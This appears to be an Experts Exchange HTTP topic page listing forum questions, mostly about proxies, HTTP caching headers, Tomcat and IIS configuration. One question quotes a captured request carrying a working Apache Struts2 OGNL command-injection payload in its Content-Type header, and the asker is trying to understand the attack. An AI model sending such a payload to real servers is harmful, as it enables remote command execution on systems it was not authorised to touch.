HTTP Protocol

The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems. Hypertext is structured text that uses logical links (hyperlinks) between nodes containing text. HTTP is the protocol to exchange or transfer hypertext. HTTP functions as a request-response protocol in the client-server computing model. HTTP is designed to permit intermediate network elements to improve or enable communications between clients and servers. HTTP is an application layer protocol designed within the framework of the Internet Protocol Suite; it presumes an underlying and reliable transport layer protocol.

Share tech news, updates, or what's on your mind.

Sign up to Post

I'm trying to configure Pound Reverse Proxy with a HTTPS connection to a Webserver in the backend. Unfortunately it does not work. If I use unencrypted HTTP, it works. Syslog says:
Jun  8 11:11:39 transfer pound: BIO_do_handshake with XXX.XXX.XXX.XXX:443 failed: error:00000000:lib(0):func(0):reason(0)
openssl s_client -connect example.com:443 says "CONNECTION OK".

The used config part of Pound:

 ListenHTTPS
        HeadRemove "X-Forwarded-Proto"
        AddHeader "X-Forwarded-Proto: https"
        Address YYY.YYY.YYY.YYY
        Port    443
        Cert    "/etc/ssl/pound/server.pem"

        ## allow PUT and DELETE also (by default only GET, POST and HEAD)?:
        xHTTP           1

        Service
                BackEnd
                        Address XXX.XXX.XXX.XXX
                        Port    443
                        HTTPS
                End
        End

I've been surfing the net for several hours with no solution, so I thought "maybe experts exchange can help"?


****** edit #1 a few hours later ******

I sniffed the traffic between the reverse proxy and the https-backend-server. I added a screen capture. It seems that the web server just does not answer, then pound runs into a timeout and closes the connection, but I'm not an expert. I've tried to put pound in front of several web servers, with the same effect. I assume that they dislike something in the "handshake-request-packet", but I have no clue what, because I get no …
0
Cloud Class® Course: Microsoft Office 2010
LVL 12
Cloud Class® Course: Microsoft Office 2010

This course will introduce you to the interfaces and features of Microsoft Office 2010 Word, Excel, PowerPoint, Outlook, and Access. You will learn about the features that are shared between all products in the Office suite, as well as the new features that are product specific.

My question is about this part of the HTTP/1.1 Caching protocol, see:
https://tools.ietf.org/html/rfc7234#page-17 (Handling a Received Validation Request)

A request containing an If-None-Match header field (Section 3.2 of
[RFC7232]) indicates that the client wants to validate one or more of
its own stored responses in comparison to whichever stored response
is selected by the cache.

When a cache decides to revalidate its own stored responses for a
request that contains an If-None-Match
list of entity-tags, the cache
MAY combine the received list with a list of entity-tags from its own
stored set of responses (fresh or stale) and send the union of the
two lists as a replacement If-None-Match header field value in the
forwarded request.

If the response to the forwarded
request is 304 (Not Modified) and has an ETag header field value with
an entity-tag that is not in the client's list, the cache MUST
generate a 200 (OK) response for the client by reusing its
corresponding stored response, as updated by the 304 response
metadata (Section 4.3.4).

Let's assume we have:

  • A browser cache.
  • A proxy cache.
  • An origin server.

The browser cache contains a stored stale resource with entity-tag "A". The proxy cache contains a stored stale resource with entity-tag "B". The proxy cache can act as a client, and as a server. The entity-tag of the resource on the origin server is also "A". In short:


Open in new window

0
See: https://tools.ietf.org/html/rfc7232#page-19 (304 Not Modified)

If the conditional request originated
with an outbound client, such as a user agent with its own cache
sending a conditional GET to a shared proxy, then the proxy SHOULD
forward the 304 response to that client
.

I don't understand this part of the protocol. The word "forward" implies that the proxy, got the 304 response from somewhere else in the first place. I would think that the proxy creates the 304 response and doesn't forward it? How I have to interpret this quote? Where the 304 response is coming from in the first place?


Imagine you have:

user agent   <->   browser cache   <->   proxy cache   <->   origin server   

Open in new window


In my opinion, this is what will happen:

  1. The user agent initiates the request.
  2. The browser cache adds for example If-None-Match (Etag) to the request.
  3. The proxy cache receives this request.
  4. If the proxy cache contains a valid response, and the entity-tags are the same, then a 304 response will be created by the proxy cache.
  5. The 304 response will be sent to the browser cache and the user agent.

This is not a forward, so where the word "forward" is coming from?

If the origin server would have created the 304 response, then a proxy server can receive and forward this response. However, I don't think you have to see it like that. Imagine the entity-tag …
0
Hi I am sending an email blast and on email I am connecting each button with userid so if any user who get email click that email then  his click can be recorded. For eg Button click is like this:
http://www.Testweb.com/Pages/EmailBlast/Email.aspx?Id=1&page=www.Testweb.com/Pharmaceutical_Packaging__Details.aspx

previously I was using 3.5 framework and it was working fine there but now after switching to framework 4.0, instead of going to page Email.aspx
its trying to go to www.Testweb.com/Pharmaceutical_Packaging__Details.aspx, FYI I am doing URL rewriting also.

   How I can fix this problem. For fixing issue I had to remove http tag so when I call page like below then its working
http://www.Testweb.com/Pages/EmailBlast/Email.aspx?Id=1&page=Pharmaceutical_Packaging__Details.aspx


  Please help
0
In Android 6.0, using SDK 25, should java.net.HttpURLConnection be obeying the system properties http.keepAlive and http.maxConnections?

With netstat, I can verify that in the system there are 2 TCP connections continuously open to my server. These connections appear to be neatly reused for HTTP keep alive and they appear when I start the player, disappear when I stop the player. I am using ExoPlayer for live dash streaming (player is downloading approx 3-5 files every 10 seconds from the same server, audio chunk, video chunk and manifest).

But the underlying system seems to ignore the http.maxConnections (and even http.keepAlive) that I wish to control.

My goal is to set http.maxConnections to 1 and ensure there is exactly 1 HTTP keep alive (TCP) connection open to the server. Any way to accomplish this?
0
See: https://blogs.msdn.microsoft.com/ieinternals/2009/07/20/internet-explorers-cache-control-extensions/

Generally, the pre-check directive is very similar to max-age. However, IE's implementation of max-age takes the Age response header into account. In contrast, the implementation of post-check and pre-check do not. Hence, pre-check is equivalent to max-age only when there is no Age header on the response.

This article is from 2009, so pretty old. How max-age and the Age header are related nowawdays? Or are they not related at all anymore?
0
My question is about one specific reason to use max-age over Expires.

See for example: https://www.mnot.net/cache_docs/#EXPIRES
Although the Expires header is useful, it has some limitations. First, because there’s a date involved, the clocks on the Web server and the cache must be synchronised; if they have a different idea of the time, the intended results won’t be achieved, and caches might wrongly consider stale content as fresh.

But with max-age you also have the exact same problem, right? In my opinion there are 2 possibilities:

1. A cache receives a response from a server. The cache's clock starts counting from that moment. If there would be a delay between the server sending the response, and the cache receiving the response, then the age would be incorrect. So this is not a good way to calculate the age.

2. A cache receives a response from a server. The age of the response is calculated as a difference between the cache's current date and the Date general header included in the HTTP response.

Case 2 is in my opinion the right way to calculate the age of the response. But the reponse header field "Date" will be determined by the server. Just like "Expires" will be determined by the server. So in both cases the server's clock will be compared with the cache's clock. So in this respect (clock synchronization), I see no difference between max-age and Expires?

With case 1 they would be right, because then the cache's clock on moment A …
0
When a stored response is used to satisfy a request without validation, my browser is not showing me the HTTP reponse header field: "Age"?

Just take a simple test.html file, which is chacheable by default. Now visit the page 2 times, so the second time the file is shown directly from cache without validation.

Firefox shows me response headers like this:

Date: Mon, 12 Mar 2018 16:05:18 GMT
Server: Apache/2.4.17 (Unix) OpenSSL/1.0.1e-fips PHP/5.6.16
Last-Modified: Mon, 12 Mar 2018 12:24:12 GMT
Accept-Ranges: bytes
Content-Length: 143
Content-Type: text/html

Open in new window


But why Firefox does not show me the "Age" header field?

See: https://tools.ietf.org/html/rfc7234

When a stored response is used to satisfy a request without validation, a cache MUST generate an Age header field

And see: https://tools.ietf.org/html/rfc7234#section-5.1

However, lack of an Age header field does not imply the origin was contacted, since the response might have been received from an HTTP/1.0 cache that does not implement Age.

A browser's cache is not HTTP/1.0, so the response headers must contain an Age header field. Firefox is not showing me "Age"?

Are browsers only showing the response and request headers of the server? But if that's the case then they had to show no response headers at all, because there was no response from server in case of "200 OK (cached)"?

So I don't understand this? What's the logic behind this?

P.S. The example was about Firefox, but for example Chrome is doing the same.
0
See: http://php.net/manual/en/function.session-cache-limiter.php

PHP is using:

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Open in new window


I don't understand this 100%. A cache could have a different idea about time. Although it's really rare, a cache could think it's 1980. In a case like that, the cached copy will be seen as fresh.

When using:

Expires: 0

Open in new window


you can avoid problems like that. So in my opinion PHP is choosing the second best solution instead of the best solution.

See: https://tools.ietf.org/html/rfc7234#section-5.3

A cache recipient MUST interpret invalid date formats, especially the
value "0", as representing a time in the past (i.e., "already
expired").

So when using the value "0", you know for sure it will be seen as a date in the past. But this is the protocol for HTTP/1.1 (not HTTP/1.0).

I was also searching for some information about HTTP/1.0 and invalid dates, but I could not find an answer. I know HTTP/1.0 CAN implement things from HTTP/1.1.

How HTTP/1.0 caches are dealing with invalide dates? And can I be sure that in all situations "Expires: 0" will be seen as a date in the past? And if no, do you have examples?

I saw Google is using:

Expires: -1

Open in new window


In the past people were setting Expires via html via the meta tag ... in cases like that "-1" could mean something different than "0", but in what kind of situations "Expires: -1" means something different than "Expires: 0" in the http headers?

So what to use? Date in the past, 0 or -1?
0
I'm trying to understand:

Vary: Accept-Encoding

Open in new window


Let's say we have:

- client 1 (only understands gzip-encoding)
- client 2 (only understands deflate-encoding)
- a shared cache
- a server (supports gzip and deflate encoding / compression, so the server can send the response message body encoded / compressed)
- a resource (1 url, cacheable)

If client 1 first will make a request to the resource, then the response will be stored in cache. The resource is gzip-encoded. If now client 2 will make a request, then the cache will server the gzip-encoded version which client 2 does not understand.

This is what I understand about it from the internet. But this sounds weird to me.

1. The stored reponse in cache must contain: "Content-Encoding: gzip", because when a server will send an encoded response, it will let you know which encoding has been used. So if I would be a cache and I would get a request with "Accept-Encoding: deflate" (or with an empty value). As a cache I know that my stored response is gzip-encoded (because of the stored "Content-Encoding: gzip"). Then I don't need no "Vary: Accept-Encoding" to know that I have to make a new request to the server??

So why "Vary: Accept-Encoding" exists anyway and in what kind of situations it really makes a difference?

2. Are there also caches around, which can decode / encode (gzip / deflate)? In cases like there is also no need to add "Vary: Accept-Encoding", because a cache could decode …
0
Cloud Class® Course: CompTIA Healthcare IT Tech
LVL 12
Cloud Class® Course: CompTIA Healthcare IT Tech

This course will help prep you to earn the CompTIA Healthcare IT Technician certification showing that you have the knowledge and skills needed to succeed in installing, managing, and troubleshooting IT systems in medical and clinical settings.

If you have for exampe an image with max-age=31536000, when using HTTPS what is the best to do:

1:
Cache-Control: public, max-age=31536000

Open in new window


2:
Cache-Control: private, max-age=31536000

Open in new window


3:
Cache-Control: max-age=31536000

Open in new window


Which one and why?


I also did some own research, but I'm not sure yet what the answer has to be. I think this is true:

By default web browsers should cache content over HTTPS the same as over HTTP, unless explicitly told otherwise via the HTTP Headers received.

This is about the cache of the browser. For shared caches I think this is true:

If the request is authenticated or secure (i.e., HTTPS), it won’t be cached by shared caches.

Google is saying here, see: https://developers.google.com/web/fundamentals/performance/optimizing-content-efficiency/http-caching

If the response is marked as "public", then it can be cached, even if it has HTTP authentication associated with it, and even when the response status code isn't normally cacheable. Most of the time, "public" isn't necessary, because explicit caching information (like "max-age") indicates that the response is cacheable anyway.

That's what Google is saying, but I also checked what they are doing. See:

Example: https://www.google.nl/images/branding/googlelogo/2x/googlelogo_color_120x44dp.png
cache-control:private, max-age=31536000

Open in new window


Example: https://www.google.com/textinputassistant/tia.png
cache-control:public, max-age=31536000

Open in new window

0
Reponse headers can contain something like:

Cache-Control: must-revalidate

Open in new window


But "must-revalidate" does not exist for the request headers, see:

https://tools.ietf.org/html/rfc7234.html#section-5.2.1

Why? Is there a reason behind this?

Take for example me, my browser, my browser's cache and the origin server. Let's say there is a stale cached copy in the browser's cache. Imagine I don't want the cached copy to be served without making any request to the server. Also not if the cache is disconnected from the origin server. I could add must-revalidate in the request headers, but this only exists for the response headers in similar situations.

Why is that and what's behind it? Directives like max-age, no-cache, no-store you have for the response AND the request directives, so why must-revalidate is an exception to that?
0
Let's first take a look at the definitions.

1. Max-age in request headers:
See: https://tools.ietf.org/html/rfc7234.html#section-5.2.1

The "max-age" request directive indicates that the client is
unwilling to accept a response whose age is greater than the
specified number of seconds.  Unless the max-stale request directive
is also present, the client is not willing to accept a stale
response.

2. Max-age in the response headers:
See: https://tools.ietf.org/html/rfc7234.html#page-26

The "max-age" response directive indicates that the response is to be
considered stale after its age is greater than the specified number
of seconds.

And see: https://tools.ietf.org/html/rfc7234#section-4.2.4

A cache MUST NOT send stale responses unless it is disconnected
(i.e., it cannot contact the origin server or otherwise find a
forward path)

So is it true that "max-age=0" in the response headers is NOT equivalent to "no-cache" in the reponse headers (because of case disconnected), BUT "max-age=0" in the request headers IS equivalent to "no-cache" in the reponse headers?

3. No-cache in the request headers:
See: https://tools.ietf.org/html/rfc7234.html#page-23

The "no-cache" request directive indicates that a cache MUST NOT use
a stored response to satisfy the request without successful
validation on the origin server.

4. No-cache in the response headers:
See: https://tools.ietf.org/html/rfc7234.html#section-5.2.2</a>
0
Dear sirs,
I am setting up a global exception handler in Spring. Once an exception is caught, a method in the @ControllerAdvice is called in, and returns a specific view with exception details. Among info returned with the view, I have the HttpStatus, that can get. Actually I keep getting 200, while the right HttpStatus should be 500, 404, etc.
Here is my code
@ControllerAdvice
@Slf4j
public class AppGlobalExceptionHandler {
      /*
       * Note: You can either point to Exception Types or Http ResponseStatus
       * @ExceptionHandler({MyException.class})
       * public String ...
       *
       * @ExceptionHandler
       * @ResponseStatus(HttpStatus.INTERNAL_SERVER_ERROR)
       * public String
       * */
      
      @ExceptionHandler
      public String handleAnyException(Exception exception, Model model,
                  HttpServletRequest request, HttpServletResponse response) {
            
            log.error("Request raised " + exception.getClass().getSimpleName());
            
            String details = ExceptionUtils.getStackTrace(exception);
            
            AppError error = new AppError();
            error.setStatus(response.getStatus());
            error.setUrl(String.valueOf(request.getRequestURL()));
            error.setMessage(exception.getMessage());
            error.setDetails(details);
            
            model.addAttribute(AppStringHandler.VARIABLE_URL_SUBMIT, AppStringHandler.URL_TASKS_SEND_EMAIL_500);
            model.addAttribute(AppStringHandler.VARIABLE_URL_REDIRECT, AppStringHandler.URL_ADMIN_REDIRECT);
            model.addAttribute(AppStringHandler.VIEW_ERROR_MODEL_ATTRIBUTE, error);
            
            …
0
Our mobile app is experiencing a strange behavior in a place where they have WiFi. If the app uses THAT WiFi there's an HTTP POST request (to our API) that gets the response content truncated randomly (not always truncated, and if truncated not always at the same place).

I made several tests at that place (using the app and also Postman) and found that on mobile data the response always comes OK, but when connecting with that WiFi the response sometimes gets truncated. Also, I saw that other API requests get the response correctly, even when the content length is 10 times bigger (I thought that maybe the response was too big, but we're talking about just 10Kb).

The failing request is a regular POST request sent to a REST API made with Dropwizard. The request gets processed correctly on the server, which returns status 200 and the content. The client gets the status 200 but the content is truncated, so the whole operation can't be finished.

I wonder if there's something wrong with that WiFi, or if this kind of response errors must be expected and dealt by our application. I haven't seen this behavior before.
0
I want to create an IIS URL rewrite rule which should make the site to respond with the same content on any request. This rule is to be applied when the site goes under a maintenance.
My rule looks like the following:
        <rewrite>
            <rules>
                <rule name="Stub" enabled="true" patternSyntax="ECMAScript" stopProcessing="true">
                    <match url=".*" />
                    <action type="Rewrite" url="/maintenance.htm?URL={R:0}" appendQueryString="true" logRewrittenUrl="true" />
                    <conditions>
                        <add input="{REMOTE_ADDR}" pattern="127.0.0.1" negate="true" />
                        <add input="{REMOTE_ADDR}" pattern="172.31.3" negate="true" />
                    </conditions>
                </rule>
            </rules>
        </rewrite>        

Open in new window

It works perfectly for any request to resources in the root folder. But on any request to a sub-directory the server responds with 403 Forbidden

For example, a request like http://mysite.com/s.gif correctly returns the content of the file maintenance.htm (located in the site's root folder), but a request like http://mysite.com/2/s.gif  returns
 <h2>403 - Forbidden: Access is denied.</h2>
  <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>

Open in new window

(there is a file /2/s.gif and it is correctly returned when the rule is disabled).
In the W3SVC log file I can see:
2017-12-20 22:01:36 172.31.34.109 GET /maintenance.htm URL=2/s.gif 443 - 173.161.245.141 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:52.0)+Gecko/20100101+Sea-Monkey/2.49.1+(similar+to+Firefox/52.0) - 403 18 0 78

Open in new window

Please help.
0
My question is about: https://www.mnot.net/blog/2007/05/15/expires_max-age

They're saying:

The problem with that line of reasoning is that HTTP versions aren’t black and white like this; just because something advertises itself as HTTP/1.0, doesn’t mean it doesn’t understand HTTP/1.1 (see RFC2145 for more).

But here they are saying:

https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9.3

If a response includes both an Expires header and a max-age directive, the max-age directive overrides the Expires header, even if the Expires header is more restrictive. This rule allows an origin server to provide, for a given response, a longer expiration time to an HTTP/1.1 (or later) cache than to an HTTP/1.0 cache.

So or the article is incorrect, or W3 is incorrect (or I'm wrong :p). With the last sentence, W3 means you can give a different expiration time to a HTTP/1.1 cache (or later), compared with a HTTP/1.0 cache. You can do this by using max-age and the Expires header.
So they can only say something like that, by assuming the HTTP/1.0 cache will ignore the max-age, because otherwise you will just have the same expiration time for all the caches (HTTP/1.0 and HTTP/1.1 et cetera).

So what is true about HTTP/1.0 caches understanding max-age?
0
Experts,

In this sample GET request

GET / HTTP/1.1
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Accept: */*
Referer: http://108.100.150.170:80/
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 108.100.150.170
Connection: Keep-Alive

 Questions:
The content-type begins with something that is not normal. Is it trying to get the webserver to process it and execute something?  I also see java.lang so it is trying to call a java function.   What is it trying to do with java?

What is it doing with the command prompt and shell bash command prompt?

What is the purpose of echoing STRUSTS2045?
0
This is a great video (however the links no longer work):
https://www.youtube.com/watch?v=Usydlsc2uWE
I need a real life example of IF someone clicks on a bad link via email or whatever avenue how the redirected website collects their credentials. Anyone have any good ones?

TIA!!
0
Get your problem seen by more experts
LVL 12
Get your problem seen by more experts

Be seen. Boost your question’s priority for more expert views and faster solutions

Hello , does anyone knwo how to transfer iPhone contacts and messages to Android phone without any loss ? i've tried many ways to transfer them , but always fail ,and i don't how to connect the differen operation phones ,
Pls
0
Hi,
how can I disable HTTPS and enable HTTP on apache Tomcat?
Based on my researches I have to modify the server.xml in the root folder of apache tomcat. Must I modify the connector? how?
For my Webapplication I'm connecting to the port 8443
<?xml version='1.0' encoding='utf-8'?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<!-- Note:  A "Server" is not itself a "Container", so you may not
     define subcomponents such as "Valves" at this level.
     Documentation at /docs/config/server.html
 -->
<Server port="-1" shutdown="SHUTDOWN">
  <!-- Security listener. Documentation at /docs/config/listeners.html
  <Listener className="org.apache.catalina.security.SecurityListener" />
  -->
  <!--APR library loader. Documentation at 

Open in new window

0
How to display html detail when clicking submipls
0
In internet explorer i am able to access a https site and download a file. i have to use an username and password to access the site first.
However, when i enter the URL and credentials in SSIS using the HTTP connection managerand press the test connection button,  i get the message:

The remote server returned an error: (401) Unauthorized.

Any ideas why this is happening. The username and password are correct.

Can i use an https site in a http connection?

Any help appreciated.

Thanks
0
I have used 3 set of codes(where I used Indy10.6.2 component), which doesn't show any errors, but i can't able to send SMS through the code. Please help me to send me the Sms through Delphi code

The code which I used is...

const
  URL = 'https://api.bulksmsgateway.in/send/?username=****&hash=****&sender=TXTLCL&numbers=9198........&message=HISUNDAR';
  //URL = 'https://api.textlocal.in/send/?username=*****&hash=******&sender=TXTLCL&numbers=9198...&message=HISUNDAR';
  ResponseSize = 1024;
var
  hSession, hURL: HInternet;
  Request: String;
  ResponseLength: Cardinal;
begin
  hSession := InternetOpen('TEST', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
  try
    Request := Format(URL,[Username,Password,Sender,Numbers,HttpEncode(Message1)]);
    hURL := InternetOpenURL(hSession, PChar(Request), nil, 0,0,0);
    try
      SetLength(Result, ResponseSize);
      InternetReadFile(hURL, PChar(Result), ResponseSize, ResponseLength);
      SetLength(Result, ResponseLength);
    finally
      InternetCloseHandle(hURL)
    end;
    showmessage(result);
  finally
    InternetCloseHandle(hSession)
  end





var
http : TIdHTTP;
IdSSL : TIdSSLIOHandlerSocketOpenSSL;
begin
 http := TIdHTTP.Create(nil);
 IdSSL := TIdSSLIOHandlerSocketOpenSSL.Create(nil);
 try
  Http.ReadTimeout := 30000;
  Http.IOHandler := IdSSL;
  IdSSL.SSLOptions.Method := sslvTLSv1;
  Http.Request.BasicAuthentication := True;
 // IdSSL.SSLOptions.Method := sslvTLSv1;
  …
0
I am using the following query to get the CNAME record to load my site properly. The issue: The code below works ... but only if refreshed a couple of times.

Query ::

$recsDNS = dns_get_record($_SERVER['HTTP_HOST'], DNS_CNAME );
print_r($recsDNS);

Not getting CNAME records Properly, SOme times coming and some times Not.

If I use DNS_ALL :: After refreshing 3 to 4 times i am getting CNAME records.
0

HTTP Protocol

The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems. Hypertext is structured text that uses logical links (hyperlinks) between nodes containing text. HTTP is the protocol to exchange or transfer hypertext. HTTP functions as a request-response protocol in the client-server computing model. HTTP is designed to permit intermediate network elements to improve or enable communications between clients and servers. HTTP is an application layer protocol designed within the framework of the Internet Protocol Suite; it presumes an underlying and reliable transport layer protocol.

Top Experts In
HTTP Protocol
<
Monthly
>